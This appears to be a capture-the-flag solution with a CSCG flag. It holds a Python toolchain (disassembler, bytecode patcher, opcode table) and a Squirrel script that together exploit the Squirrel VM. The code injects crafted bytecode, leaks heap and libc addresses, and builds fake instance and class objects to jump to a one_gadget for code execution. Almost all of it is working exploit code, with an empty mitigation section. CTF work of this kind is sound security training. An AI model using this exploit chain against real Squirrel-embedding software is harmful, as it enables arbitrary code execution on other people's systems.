            localvarinfos.append((name, pos, start, end))

        part = self.read(4)
        assert(part == b'TRAP')

        lineinfos = self.read(n_lineinfos*16)

        part = self.read(4)
        assert(part == b'TRAP')

        defaultparams = self.read(n_defaultparams*8)

        part = self.read(4)
        assert(part == b'TRAP')

        instructions = []
        for i in range(n_instructions):
            [arg1, op, arg0, arg2, arg3] = struct.unpack("iBBBB", self.read(8))
            ins = SQInstruction(op, arg0, arg1, arg2, arg3)
            instructions.append(ins)


        part = self.read(4)
        assert(part == b'TRAP')

        functions = []
        for _ in range(n_functions):
            functions.append(self.parse_function())

        [stack_size] = struct.unpack("Q", self.read(8))
        [is_generator] = struct.unpack("B", self.read(1))
        [var_params] = struct.unpack("Q", self.read(8))

        return SQFunction(sourcename,function_name,literals,parameters,outervalues,localvarinfos,lineinfos,defaultparams,instructions,functions,stack_size,is_generator,var_params)

    def read(self, n):
        b = self.pos+n
        data = self.data[self.pos:b]
        self.pos = b
        return data

    def __repr__(self):
        return "%r" % (self.main)

    


if __name__ == "__main__":
    with open("test.cnut", "rb") as f:
        data = f.read()

    f = SQFile(data)
    f.parse()
    print("%r" % (f))

patcher:

import assembler as asm
import disassembler as dism
from sqdef import *
import struct
import os

DEBUG = True
step = 40

def get_fn(base,name):
    if base.function_name == name:
        return base
    for fn in base.functions:
        f = get_fn(fn,name)
        if f:
            return f
    return None

def r_apply(base,fn):
    fn(base)
    for f in base.functions:
        r_apply(f,fn)

def split_injection(fn):
    inj_idx = -1
    ej_idx = -1
    for idx, ins in enumerate(fn.instructions):
        if op2name[ins.op] == "LOAD":
            if fn.literals[ins.arg1] == (tmap['OT_STRING'], "INJECT"):
                inj_idx = idx
            elif fn.literals[ins.arg1] == (tmap['OT_STRING'], "EJECT"):
                ej_idx = idx
    if inj_idx == -1 or ej_idx == -1:
        return None, None, None
    return fn.instructions[:inj_idx],fn.instructions[ej_idx+1:], fn.instructions[inj_idx+1:ej_idx]

if __name__ == "__main__":
    os.system(r"./squirrel/bin/sq.exe -c -o test.cnut test.nut")
    
    with open("test.cnut","rb") as f:
        data = f.read()

    f = dism.SQFile(data)
    f.parse()

    stack_up = get_fn(f.main,"stack_up")
    if stack_up:
        print(stack_up)
        print("[*] patching stack_up function")
        #def fn(x):
        #    x.stack_size = -0xFFFFFFF
        #r_apply(f.main,fn)
        
        


    ip2st_fn = get_fn(f.main,"ip2st")
    if ip2st_fn:
        print("[*] patching ip2st function")
        before, after, between = split_injection(ip2st_fn)
        target = -1
        for ins in before:
            if op2name[ins.op] == "LOAD":
                target = ins.arg0
        if target == -1:
            print("[!] target not found")
            exit(1)
        search_offset = 0x400
        n = 8000//step
        ip2st_fn.literals=[(tmap['OT_INTEGER'],0x1337414243441337)]*step
        ip2st_fn.literals.append((tmap['OT_STRING'],"r"))
        ip2st_fn.literals.append((tmap['OT_STRING'],"cmp"))
        pre="""
        PUSHTRAP a0:0x00 a1:%x a2: 0x00 a3:0x00
        """%(n*2)
        before+=asm.parse_assembly(pre)
        if len(before)%2==1:
            before=asm.parse_assembly("LINE a0: 0x00 a1:0x00 a2:0x00 a3:0x00")+before
        assembly=""
        for x in range(n):
            assembly+="""
            NE          a0: %x a1:%x a2:%x   a3:0x00
            JZ          a0: %x a1:%x a2:0x00 a3:0x00
            """ % (target+1,search_offset+x*step,target,
                    target+1,-((search_offset+x*step)*2-step-(step+(n-x)*2 + len(before)))
                )
        ip2st_fn.instructions = before+asm.parse_assembly(assembly)+after
    
    load_opcodes_fn = get_fn(f.main,"load_opcodes")
    if load_opcodes_fn:
        print("[*] patching load_opcodes")
        slide = step*2
        before, after, between = split_injection(load_opcodes_fn)
        #NOP SLIDE
        load_opcodes_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        LOAD        a0: 0x01 a1: %x   a2:0x00 a3:0x00
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        MOVE        a0: 0x02 a1: 0x00 a2:0x00 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,idx+2,idx+2)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_fn.literals)-1)
            idx+=1
        
        load_opcodes_fn.instructions=before+asm.parse_assembly(assembly)+after


    load_opcodes_lit_fn = get_fn(f.main,"load_opcodes_lit")
    if load_opcodes_lit_fn:
        print("[*] patching load_opcodes_lit")

        slide = step*2
        before, after, between = split_injection(load_opcodes_lit_fn)
        #NOP SLIDE
        load_opcodes_lit_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_lit_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        LOAD        a0: 0x01 a1: %x   a2:0x00 a3:0x00
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        LOAD        a0: 0x02 a1: 0x00 a2:0x00 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,idx+2,idx+2)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_lit_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_lit_fn.literals)-1)
            idx+=1
        
        load_opcodes_lit_fn.instructions=before+asm.parse_assembly(assembly)+after


    load_opcodes_cmp_fn = get_fn(f.main,"load_opcodes_cmp")
    if load_opcodes_cmp_fn:
        print("[*] patching load_opcodes")
        slide = step*2

        before, after, between = split_injection(load_opcodes_cmp_fn)
        #NOP SLIDE
        load_opcodes_cmp_fn.literals.append((tmap['OT_INTEGER'],0x0))
        assembly=""
        for idx in range(slide):
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_cmp_fn.literals)-1)
        idx = slide

        hacks = """
        LOADROOT    a0: 0x00 a1: 0x00 a2:0x00 a3:0x00
        DLOAD       a0: 0x01 a1: %x   a2:0x03 a3:%x
        GET         a0: 0x02 a1: 0x00 a2:0x01 a3:0x00
        GET         a0: 0x04 a1: 0x00 a2:0x03 a3:0x00
        ADD         a0: %x   a1: %x   a2:0x02 a3:0x00
        EQ          a0: 0x02 a1: 0x00 a2:0x04 a3:0x00
        SET         a0: 0xFF a1: 0x00 a2:0x01 a3:0x02
        LOADINT     a0: 0x03 a1: 0x42 a2:0x00 a3:0x00
        THROW       a0: 0x03 a1: 0x00 a2:0x00 a3:0x00
        """%(step,step+1,idx+3,idx+3)
        for ins in asm.parse_assembly(hacks):
            load_opcodes_cmp_fn.literals.append((tmap['OT_INTEGER'],int.from_bytes(struct.pack("iBBBB",ins.arg1, ins.op,ins.arg0,ins.arg2,ins.arg3),'little')))
            assembly+="""
            LOAD        a0:%x   a1:%x   a2:0x00 a3:0x00
            """%(idx,len(load_opcodes_cmp_fn.literals)-1)
            idx+=1
        
        load_opcodes_cmp_fn.instructions=before+asm.parse_assembly(assembly)+after

    pwn_fn = get_fn(f.main,"pwn")
    if pwn_fn:
        print("[*] patching pwn")
        before, after, between = split_injection(pwn_fn)
        patch = []
        target = None
        for ins in between:
            if op2name[ins.op] == "PREPCALLK" and pwn_fn.literals[ins.arg1]== (tmap['OT_STRING'],'seek'):
                target = ins.arg0
            if op2name[ins.op] == "CALL" and target and ins.arg1 == target:
                patch.extend(asm.parse_assembly("""
                MOVE    a0: %x a1: 0x02 a2:0x00 a3: 0x00
                """ % (ins.arg2)))
            patch.append(ins)
        pwn_fn.instructions = before+patch+after
        print(pwn_fn)

    f.main.sourcename="h4x"
    f.main.function_name = "squirrel slayer by localo"
    s = asm.SQFile()
    s.assemble(f.main,bytearray(0))
    with open("test.cnut","wb") as f:
        f.write(s.data)
    

common:

from sqdef import *

class SQInstruction:

    def __init__(self, op, arg0, arg1, arg2, arg3=0):
        self.op = op
        self.arg0 = arg0
        self.arg1 = arg1
        self.arg2 = arg2
        self.arg3 = arg3

    def __repr__(self):
        if self.op in op2name:
            op_name = "%s" % op2name[self.op]
        else:
            op_name = "UNKNOWN_%d" % self.op
        return "%-20s a0: 0x%02x a1: %s0x%08x a2: 0x%02x a3: 0x%02x" % (op_name, self.arg0, "-" if self.arg1 <0 else " ",abs(self.arg1), self.arg2, self.arg3)


class SQFunction:

    def __init__(self, sourcename="h4x", function_name="h4x", literals=[], parameters=[], outervalues=[], localvarinfos=[], lineinfos=b'', defaultparams=b'', instructions=[], functions=[],stack_size=0x8,is_generator=False,var_params=1):
        self.sourcename = sourcename
        self.function_name = function_name
        self.literals = literals
        self.parameters = parameters
        self.outervalues = outervalues
        self.localvarinfos = localvarinfos
        self.lineinfos = lineinfos
        self.defaultparams = defaultparams
        self.instructions = instructions
        self.functions = functions
        self.stack_size = stack_size
        self.is_generator= is_generator
        self.var_params = var_params
        super().__init__()

    def __repr__(self):
        ret = "*********************************************************************\n"
        ret+=" - Function: %s\n" % (self.function_name)
        ret+="\n - Literals: \n"
        for idx,x in enumerate(self.literals):
            ret+= "[%03d] %r\n"%(idx,x[1])
        ret+="\n - Instructions: \n"
        for idx, x in enumerate(self.instructions):
            ret += "[%03d] %r\n"  %(idx+1,x)
        ret += "*********************************************************************\n"
        return ret

sqdef:

SQUIRREL_VERSION_NUMBER =  310

SQ_BYTECODE_STREAM_TAG = 0xFAFA
SQOBJECT_REF_COUNTED   = 0x08000000
SQOBJECT_NUMERIC       = 0x04000000
SQOBJECT_DELEGABLE     = 0x02000000
SQOBJECT_CANBEFALSE    = 0x01000000
SQ_MATCHTYPEMASKSTRING = (-99999)
_RT_MASK = 0x00FFFFFF
_RT_NULL           = 0x00000001
_RT_INTEGER        = 0x00000002
_RT_FLOAT          = 0x00000004
_RT_BOOL           = 0x00000008
_RT_STRING         = 0x00000010
_RT_TABLE          = 0x00000020
_RT_ARRAY          = 0x00000040
_RT_USERDATA       = 0x00000080
_RT_CLOSURE        = 0x00000100
_RT_NATIVECLOSURE  = 0x00000200
_RT_GENERATOR      = 0x00000400
_RT_USERPOINTER    = 0x00000800
_RT_THREAD         = 0x00001000
_RT_FUNCPROTO      = 0x00002000
_RT_CLASS          = 0x00004000
_RT_INSTANCE       = 0x00008000
_RT_WEAKREF        = 0x00010000
_RT_OUTER          = 0x00020000

tmap={
    'OT_NULL' :          _RT_NULL|SQOBJECT_CANBEFALSE,
    'OT_INTEGER' :       _RT_INTEGER|SQOBJECT_NUMERIC|SQOBJECT_CANBEFALSE,
    'OT_FLOAT' :         _RT_FLOAT|SQOBJECT_NUMERIC|SQOBJECT_CANBEFALSE,
    'OT_BOOL' :          _RT_BOOL|SQOBJECT_CANBEFALSE,
    'OT_STRING' :        _RT_STRING|SQOBJECT_REF_COUNTED,
    'OT_TABLE' :         _RT_TABLE|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_ARRAY' :         _RT_ARRAY|SQOBJECT_REF_COUNTED,
    'OT_USERDATA' :      _RT_USERDATA|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_CLOSURE' :       _RT_CLOSURE|SQOBJECT_REF_COUNTED,
    'OT_NATIVECLOSURE' : _RT_NATIVECLOSURE|SQOBJECT_REF_COUNTED,
    'OT_GENERATOR' :     _RT_GENERATOR|SQOBJECT_REF_COUNTED,
    'OT_USERPOINTER' :   _RT_USERPOINTER,
    'OT_THREAD' :        _RT_THREAD|SQOBJECT_REF_COUNTED,
    'OT_FUNCPROTO' :     _RT_FUNCPROTO|SQOBJECT_REF_COUNTED,
    'OT_CLASS' :         _RT_CLASS|SQOBJECT_REF_COUNTED,
    'OT_INSTANCE' :      _RT_INSTANCE|SQOBJECT_REF_COUNTED|SQOBJECT_DELEGABLE,
    'OT_WEAKREF' :       _RT_WEAKREF|SQOBJECT_REF_COUNTED,
    'OT_OUTER' :         _RT_OUTER|SQOBJECT_REF_COUNTED,
}

name2op={
'LINE':               0x00,
'LOAD':               0x01,
'LOADINT':            0x02,
'LOADFLOAT':          0x03,
'DLOAD':              0x04,
'TAILCALL':           0x05,
'CALL':               0x06,
'PREPCALL':           0x07,
'PREPCALLK':          0x08,
'GETK':               0x09,
'MOVE':               0x0A,
'NEWSLOT':            0x0B,
'DELETE':             0x0C,
'SET':                0x0D,
'GET':                0x0E,
'EQ':                 0x0F,
'NE':                 0x10,
'ADD':                0x11,
'SUB':                0x12,
'MUL':                0x13,
'DIV':                0x14,
'MOD':                0x15,
'BITW':               0x16,
'RETURN':             0x17,
'LOADNULLS':          0x18,
'LOADROOT':           0x19,
'LOADBOOL':           0x1A,
'DMOVE':              0x1B,
'JMP':                0x1C,
'JCMP':               0x1D,
'JZ':                 0x1E,
'SETOUTER':           0x1F,
'GETOUTER':           0x20,
'NEWOBJ':             0x21,
'APPENDARRAY':        0x22,
'COMPARITH':          0x23,
'INC':                0x24,
'INCL':               0x25,
'PINC':               0x26,
'PINCL':              0x27,
'CMP':                0x28,
'EXISTS':             0x29,
'INSTANCEOF':         0x2A,
'AND':                0x2B,
'OR':                 0x2C,
'NEG':                0x2D,
'NOT':                0x2E,
'BWNOT':              0x2F,
'CLOSURE':            0x30,
'YIELD':              0x31,
'RESUME':             0x32,
'FOREACH':            0x33,
'POSTFOREACH':        0x34,
'CLONE':              0x35,
'TYPEOF':             0x36,
'PUSHTRAP':           0x37,
'POPTRAP':            0x38,
'THROW':              0x39,
'NEWSLOTA':           0x3A,
'GETBASE':            0x3B,
'CLOSE':              0x3,
}
op2name = {v: k for k, v in name2op.items()}

template:

function get_addy(obj){
    local l = tostring.pcall(obj)
    local idx = l.find("0x")
    while(idx>=0){
        l = l.slice(idx+2)
        idx = l.find("0x")
    }
    return l.slice(0,-1).tointeger(16)
}

function ip2st(){
    local a = 0x1337414243441337
    "INJECT"
    "EJECT"
    return a
}

function load_opcodes(){
    "INJECT"
    "EJECT"
    ip2st()
}

function load_opcodes_cmp(){
    "INJECT"
    "EJECT"
    ip2st()
}

function map_offset(a = 0x4343434343434343){

}
::base_addr <- get_addy(map_offset)
print(format("[*] base: 0x%016x\n",::base_addr))
local offset = 0
::cmp <- 0x4343434343434343
for(local i = 400; i< 8*1024; i+=1){
    ::r <- i
    load_opcodes_cmp()
    if(::r){
        print(i+" Found\n");
        offset = (i+0x1)
        break
    }
}

print(format("[*] base_offset: 0x%016x\n",offset))

::r<-offset


load_opcodes()

::base_offset<-(offset-8)
function addr2offset(addr){
    local o = (addr-::base_addr)>>4
    return (o + ::base_offset)& 0xFFFFFFFF
}

function offset2addr(offset){
    local o = (offset-::base_offset)<<4
    return (o + ::base_addr)
}

function pwn(err){
    local a = ::r
    local b = blob(4)
    "INJECT"
    b.writen(0x00,'i')
    "EJECT"
    print(a)
}

local b = blob(1024) #set main_arena pointer
b.writen(0x05000002,'i')
b.writen(0x00,'i')
b.writen(0x4142434445464748,'l')
b.writen(0x05000002,'i')
b.writen(0x00,'i')
b.writen(0x4141414141414141,'l')

::cmp <- 0x4142434445464748
for(local i = 400; i< 8*1024; i+=1){
    ::r <- i
    load_opcodes_cmp()
    if(::r){
        print(i+" Found\n");
        offset = (i+0x2)
        break
    }
}

local add = offset2addr(offset)
print(format("[*] blob is at 0x%016x\n", add))

#fake native instance
b.writen(0xa008000,'i')
b.writen(0x00,'i')
b.writen(add+0x10*3,'l')

::r<-addr2offset(add+1024-0x10)
load_opcodes()

local l_main = get_addy(::r)
local l_offset = 0x1eb080
local oneg_offset = 0xe6b99
print(format("[*] libc_main_arena leak: 0x%016x\n", l_main))
if(l_offset!=0x00){
    print(format("[*] libc base: 0x%016x\n",l_main-l_offset))
    #fake instance
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #vptr
    b.writen(0x0,'l') #uiref
    b.writen(0x0,'l') #weakref
    b.writen(0x0,'l') #_next
    b.writen(0x0,'l') #_prev
    b.writen(0x0,'l') #_shared_sate
    b.writen(0x0,'l') #_delegate
    b.writen(add+0x10*3+0x8*13,'l') #_class
    b.writen(add+0x10*3+0x8*13,'l') #_userpointer
    b.writen(0x0,'l') #_hook
    b.writen(0x0,'l') #_memsize
    b.writen(0x0,'l') #_values[0].type
    b.writen(0x0,'l') #_values[0].val

    #fake blob _class
    b.writen(add+0x10*3+0x8*(13+21+0x12*2)-0x40,'l') #vptr
    b.writen(0x0,'l') #uiref
    b.writen(0x0,'l') #weakref
    b.writen(0x0,'l') #_next
    b.writen(0x0,'l') #_prev
    b.writen(0x0,'l') #_shared_sate
    b.writen(0x0,'l') #_members
    b.writen(0x0,'l') #_base
    b.writen(0x0,'l') #_default_values._vals
    b.writen(0x0,'l') #_default_values._size
    b.writen(0x0,'l') #_default_values._allocated
    b.writen(0x0,'l') #_methods._vals
    b.writen(0x0,'l') #_methods._size
    b.writen(0x0,'l') #_methods._allocated
    for(local i = 0; i<0x12;i+=1){
        b.writen(0x0,'l') #_metamoethods.type
        b.writen(0x0,'l') #_metamoethods.val    
    }
    b.writen(0x0,'l') #_attributes.type
    b.writen(0x0,'l') #_attributes.val
    b.writen(0x0000000080000000,'l') #_typetag
    b.writen(0x0,'l') #_hook
    b.writen(0x0,'l') #_locked
    b.writen(0x0,'l') #_constructoridx
    b.writen(0x0,'l') #_udsize
    b.writen(l_main-l_offset+oneg_offset,'l')

    ::r<-addr2offset(add-0x30)
    load_opcodes()
    pwn(b)
}else{
    print("[!] libc offset is not set...\n")
}

Mitigation

Flag

CSCG{t3chnic4lly_an_0d4y_but_...}